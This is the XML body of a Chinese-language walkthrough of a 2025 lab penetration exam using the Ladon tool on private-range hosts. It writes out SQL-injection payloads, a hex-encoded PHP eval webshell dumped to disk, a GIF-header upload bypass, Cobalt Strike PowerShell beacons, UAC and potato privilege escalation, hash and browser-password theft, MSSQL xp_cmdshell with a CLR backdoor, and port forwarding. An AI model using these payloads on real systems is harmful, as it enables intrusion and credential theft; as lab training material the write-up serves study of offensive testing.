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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="4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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>2025靶场渗透 Ladon实战解题过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>题目</w:t>
      </w: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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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经过调研分析发现非法组织资产IP为192.168.18.145和192.168.18.160，接到任务组织一线人员，对非法组织开展渗透，获取组织犯罪证据。加油特种兵，GO GO GO！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/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ind w:firstLine="420" w:firstLineChars="0"/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分析：拿到目标后，先看是网站、IP、邮箱、名称还是什么？根据情况决定是否需要收集相关信息？本题给的是内网IP，模拟外网场景，非真正的外网，所以外网相关信息暂时不用收集，但我们得把当前IP当成外网来渗透。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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  解题过程：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拿到的目标是IP，先查看开放什么端口，有什么信息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命令：Ladon 192.168.18.145 PortScan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933950" cy="17907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再看一下相关端口信息，通过多网卡主机探测到目标，内网存在192.168.80网段，NbtInfo探测到该机器为工作组。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3237230"/>
            <wp:effectExtent l="0" t="0" r="381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WmiInfo探测X64位，可能是Win7或2008系统，这个信息很有用，后续植入马或mimikatz读密码，位数不对执行某些CMD也有问题，还有针对MS17010等溢出漏洞攻击时，选错payload可能就蓝屏了，所以不要小看一些信息。Ladon不会无缘无故去探测系统位数，为漏洞利用准备。</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="461010"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1524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目标开放 80 135 139 3306端口，怎么办? 要吗从web渗透，要吗135 139 3306密码爆破。有WEB，那第一步，就得先思考用哪些工具，WEB漏扫最牛的工具AWVS，其它不管宣传多牛B都不太行，误报率高。如图，它把网站架构和目录结构扫出来了，同时还扫出joomla高危漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3213100"/>
            <wp:effectExtent l="0" t="0" r="635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WVS和Nuclei扫到目标版本为4.2.7，WVS还扫到高危漏洞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4310" cy="2336800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="6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Ladon上也有个Exp刚好是针对4.2.7之前版本，验证一下是否真的存在漏洞，还是误报，使用 Ladon http://192.168.18.145 JoomlaPwd 命令，成功读取到joomla的数据库密码。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4636770"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1143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3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 w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试目标mysql不允许远程连接，只能再想其它办法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman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 w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令: Ladon check.txt MysqlScan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="381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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web目录扫描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AWVS扫出来了一个漏洞，Ladon读取到了Joomla数据库密码,但是无法连接。很明显3306端口无法突破，还可以尝试135、139爆破，还有joomla爆破，通过爆破发现，弱口令失败。接下来还有什么方法？答案是扫目录，看是否存在敏感文件、数据库、网站备份，通过扫目录发现该网站上还存在一个BBS论坛，该论坛有登陆口、上传等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="5156200"/>
            <wp:effectExtent l="0" t="0" r="444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目录扫描命令： Ladon http://192.168.50.111 webdir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命令2：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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Ladon webdir2 http://192.168.50.111 -w webdir.dic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2405" cy="3367405"/>
            <wp:effectExtent l="0" t="0" r="444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7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访问BBS，看到是一个自主研发的论坛，有留言功能、消息、搜索等功能，这就好办了不是Joomla这种开源CMS，获取权限的机会要大很多了，Joomla没有漏洞或管理员密码很难getshell，但是自研网站，可能存在注入、命令执行等漏洞。</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="4351655"/>
            <wp:effectExtent l="0" t="0" r="635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对BBS进行测试，发现新闻和搜索框存在SQL注入漏洞，报错页面包含物理路径，记下来，这些信息可能有用。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1769745"/>
            <wp:effectExtent l="0" t="0" r="762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尝试Order by 1注入 正常 可以继续</w:t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711960"/>
            <wp:effectExtent l="0" t="0" r="5715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随意输一个数字 猜测字段 8 还是报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2543175" cy="10477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使用2分法，先输入4，发现正常，再到6不正常，最后测5正常，使用union读取数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋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  <w:t>and 1=2 union select 1,database(),3,version(),user();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3914775" cy="15049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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过注入点导出WebShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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and 1=2 union select 1,2,3,4,unhex('3C3F70687020406576616C28245F504F53545B27746F6D275D293B3F3E') into dumpfile 'C:/phpstudy_pro/www/bbs/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.php';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使用Hex加密一句话木马，使用dumpfile导出webshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="3434080"/>
            <wp:effectExtent l="0" t="0" r="3810" b="139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成功写入文件，获取webshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4810125" cy="274320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171825" cy="19050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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="4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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>第2个IP渗透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IP：192.168.18.160  同样的方式，扫端口，收集相关信息等。这个环境是部署好第1层和第2层环境后，因考生不在，未能进行测试，才添加第1层的另外一台机器，该环境无内网，模拟实战无内网环境。mysql爆破得到一个root root密码，该密码可远程连接，参考MYSQL注入点远程种马（https://github.com/k8gege/PPT/），通过管理工具连上后，执行相应SQL语句GetShell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2016125"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
            <wp:docPr id="7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另外一个是Shiro框架的若依管理系统，参考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"http://k8gege.org/p/shiroexp.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>http://k8gege.org/p/shiroexp.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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爆破Key，爆破利用链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3638550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="6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使用对应KEY和利用链执行命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2241550"/>
            <wp:effectExtent l="0" t="0" r="10795" b="6350"/>
            <wp:docPr id="6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通过PowerShell上线CS，配置CS参考方法2，将命令替换成CS上线命令执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2737485"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5715"/>
            <wp:docPr id="6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b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="3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CS上线，进程为PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1316355"/>
            <wp:effectExtent l="0" t="0" r="4445" b="17145"/>
            <wp:docPr id="7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  <w:t>读取密码，报错，没有权限，Win7开始默认开启UAC，即便当前是管理员用户，权限也不是管理员，所以我们要提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3002915"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="7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  <w:t>查看当前用户已经在管理员组，我们只需要过UAC即可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191125" cy="5019675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="7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  <w:t>目标是Win7操作系统，直接使用CS自带的可以UAC提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t>如果是比较新的操作系统，需要使用Ladon插件里的功能，拿到管理员或以上权限时，CS的用户后面多一个*号。提权后，参考方法2即可，后渗透是一样的，对该IP的后渗透就不写那么细了，因为该IP不可达内网，后续还是得通过145到达内网，所以重点在145机器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5095875" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7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  <w:t>也可以接着提到SYSTEM权限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129155"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:docPr id="7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b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="4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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>方法2 使用SQLMAP进行SQL注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">python sqlmap.py -u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"http://192.168.18.145/bbs/news.php?id=3" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>http://192.168.18.145/bbs/news.php?id=3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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default"/>
        </w:rPr>
        <w:t>python sqlmap.py -u http://192.168.18.145/bbs/news.php?id=3 --dump</w:t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由于是测试可以直接使用dump整个数据库，当然实战对方SB的话也可以dump，最好不要dump，使用任何工具，都不要想着一键，假设大站，数据库里会有很多表，很多数据，sqlmap可能会产生成千上成请求，具体和注入类型以及数据量有关系。还有一点假设只通过几条命令获取数据，要是数据量大，是否产生的流量很大呢？流量大就很容易被发现？所以不要拿学习或搞几个站靠运气遇到SB管理员没被发现的经验，来对抗懂安全的管理员。一键要看情况，不是无脑乱用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="3350895"/>
            <wp:effectExtent l="0" t="0" r="889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使用LadonGUI---Encode加密解密模块进行解密，如果没有一眼看出是base64加密，Ladon加解密上的每个模块都可以点一下，哪个解密后可登陆就是哪个。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="4253230"/>
            <wp:effectExtent l="0" t="0" r="5715" b="139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使用密码登陆后，发现有个上传点，尝试上传webshell提示只允许上传gif格式的文件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7325" cy="2042795"/>
            <wp:effectExtent l="0" t="0" r="9525" b="146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在webshell前面加上gif头信息，绕过检测，上传成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4943475" cy="31527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上传webshell后，可通过webshell植入马，上传exe、dll发现被删，所以得换一个思路，改用powershell上线CS。选择Attack-WEB Derive by----如下图所示，生成一个powershell的URL，执行命令后可上线，注意选择X64，和我们之前探测的信息一致，以免后续，某些命令或程序加载有问题。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1770" cy="4972685"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1841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7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2515235"/>
            <wp:effectExtent l="0" t="0" r="5715" b="184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由于已经是管理员权限CS上线后DumpHash获取密码</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="5494655"/>
            <wp:effectExtent l="0" t="0" r="571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9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CS上传EXE，不一会消失了，可能目标不允许上传exe，将其改成jpg，再上传发现也消失了，原来上面有“杀软”，对EXE查杀比较严格，我们可以换个思路，改用PowerShell，或者直接CS上的Ladon进行后渗透。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4695825" cy="20955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获取Chrome浏览器密码，发现一个ASPX站点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5267960" cy="339090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可以命令行Ladon ChromePwd 也可以直接右键一键使用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6690" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="1016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扫描端口 Ladon noping 192.168.80.33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4438650" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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有445看看有无MS17010漏洞，没有换一个思路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783205"/>
            <wp:effectExtent l="0" t="0" r="7620" b="17145"/>
            <wp:docPr id="6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CMS扫描看看有什么WEB应用，扫到IIS和Joomla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 xml:space="preserve">命令： </w:t>
      </w:r>
      <w:r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  <w:t>Ladon noping 192.168.80.33 cms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0500" cy="2504440"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10160"/>
            <wp:docPr id="6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使用GetHtml模块访问内网web，查看网站、路由器等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命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ladon GetHtml http://192.168.18.145/administrator/manifests/files/joomla.xml</w:t>
      </w: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通过访问joomla.xml查看Joomla版本为4.2.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="4145915"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6985"/>
            <wp:docPr id="6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最新版的CMS模块已支持Joomla版本自动识别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523490"/>
            <wp:effectExtent l="0" t="0" r="3175" b="10160"/>
            <wp:docPr id="7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Ladon有个EXP，可以一键利用读取Joomla数据库密码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9230" cy="4769485"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1206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6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 xml:space="preserve">将收集到的密码做成字典 对第2层内网机器进行SMB爆破 </w:t>
      </w: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4305300" cy="55435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测试SMBEXEC WMIEXEC无法执行命令 我们再想其办法 再把收集到的密码对数据库进行爆破，成功获取到 Pa33WordSQL2016 密码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4876800" cy="57816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拿到SQL Server数据库密码后，我们使用Ladon来提权，数据库权限，当前只能增删改查，并不能直接执行系统命令。首先先使用info查看数据库相关信息，是否具备dba权限等。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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master info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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master install_clr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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master uninstall_clr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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master clr_efspotato whoami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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master clr_badpotato whoami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  <w:t>shell powershell -exec bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master info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5269230" cy="4156075"/>
            <wp:effectExtent l="0" t="0" r="7620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执行以下2条命令，即可通过SQL数据库执行命令，当前用户为数据库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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master open_shell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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master xp_cmdshell whoami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5269865" cy="3048635"/>
            <wp:effectExtent l="0" t="0" r="6985" b="184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安装CLR后门，进一步提权，这次是将命令执行权限从服务用户提升至System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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master install_clr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5272405" cy="4639945"/>
            <wp:effectExtent l="0" t="0" r="444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安装后门后 可使用内置potato提权system执行任意命令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  <w:t>Ladon MssqlCmd 192.168.80.33 sa Pa33WordSQL2016 master clr_efspotato whoami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5274310" cy="4008120"/>
            <wp:effectExtent l="0" t="0" r="2540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执行其它命令 发现有问题 可能是Ladon来没针对CS进行优化 所以我们换个思路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5268595" cy="3020695"/>
            <wp:effectExtent l="0" t="0" r="825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CS上执行mssqlcmd有点问题 Ladon端口转发 将1433转到第1层执行： Ladon netsh add 1433 192.168.80.33 1433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参考：http://k8gege.org/Ladon/netsh.html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4552950" cy="45529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转发后，在攻击机器打第1层的1433就对应第2层的SQL数据库了 转发后 正常执行命令</w:t>
      </w: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5266690" cy="3289935"/>
            <wp:effectExtent l="0" t="0" r="1016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可执行命令后，可以进行信息收集，进程、桌面、相关配置文件等看有何收获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  <w:t>"dir c:\users\"</w:t>
      </w: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 xml:space="preserve">  看都有哪些用户 看管理员桌面上是否有什么密码文件等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4772025" cy="23622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桌面上有个pwd.txt文件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5273040" cy="2917190"/>
            <wp:effectExtent l="0" t="0" r="3810" b="165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查看文件 发现里面 提示找到 ISOK-DB 数据库密码，实战文件里面可能只出现一个IP或其它信息不一定有用户密码，而且也不会提示你去找到它的密码，所以实战信息收集工作更要细心。</w:t>
      </w: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5273675" cy="3799205"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1079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回忆一下，在第1层读取chrome浏览器我们发现有个aspx网站，我们可以去看看它有无配置文件，ASPX一般都是IIS搭建的，我们可以尝试列一下IIS目录看看。不懂就GOOGLE一下，当然现在不懂，先AI一下，让它给你一些常规配置、默认目录答案。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5269230" cy="3705860"/>
            <wp:effectExtent l="0" t="0" r="762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根目录上没有，testsqlvul888目录看看，发现web.config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5273675" cy="3165475"/>
            <wp:effectExtent l="0" t="0" r="3175" b="158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读取该文件获取用户密码 注释上还写着“考试合格 请回中心打印成绩单”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  <w:t>connectionString="Server=10.10.8.1;Database=ISOK-DB;User Id=sa;Password=Pa33WordSQL2025;"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5271135" cy="3522980"/>
            <wp:effectExtent l="0" t="0" r="5715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本次考试，桌面上的pwd.txt和web.config文件,只有system权限用户才能访问，所以不管通过什么方式执行命令，最终必须拿到system权限。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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3306445"/>
            <wp:effectExtent l="0" t="0" r="508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解决CS上执行命令不支持双引号问题，可以使用Base64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3663315"/>
            <wp:effectExtent l="0" t="0" r="4445" b="133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这样MssqlCmd就可以执行复杂命令了</w:t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590925"/>
            <wp:effectExtent l="0" t="0" r="825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b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="3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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>另一个思路，在内网中也可尝试FTP或HTTP嗅探</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t>一般进入内网，第一步要进行信息收集，目标运行了什么程序，都有哪些命令，使用Ladon Cmdline可查看目标正在运行的程序路径，以及对应程序参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2796540"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810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  <w:t>发现当前机器还有一个FTP登陆程序，说明目标存在FTP服务器，FTP上可能有想要的数据。那如何获取FTP密码呢？不知道管理员怎么时候会登陆，我们可以开启FTP嗅探。注意填写的是当前机器IP，可开启2个会话，嗅2个IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="4168775"/>
            <wp:effectExtent l="0" t="0" r="5715" b="317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  <w:t>PS：漏洞环境每分钟登陆一次，实战环境不确定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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>拿到密码后，可尝试SMB、wmi等横向，发现RPC不可用，无法执行，看到目标开放3389，我们把3389转出来，使用远程桌面看看。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命令： Ladon netsh add 3389 192.168.80.33 3389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转发后访问第1层机器的3389，就是内网的3389</w:t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7960" cy="3322320"/>
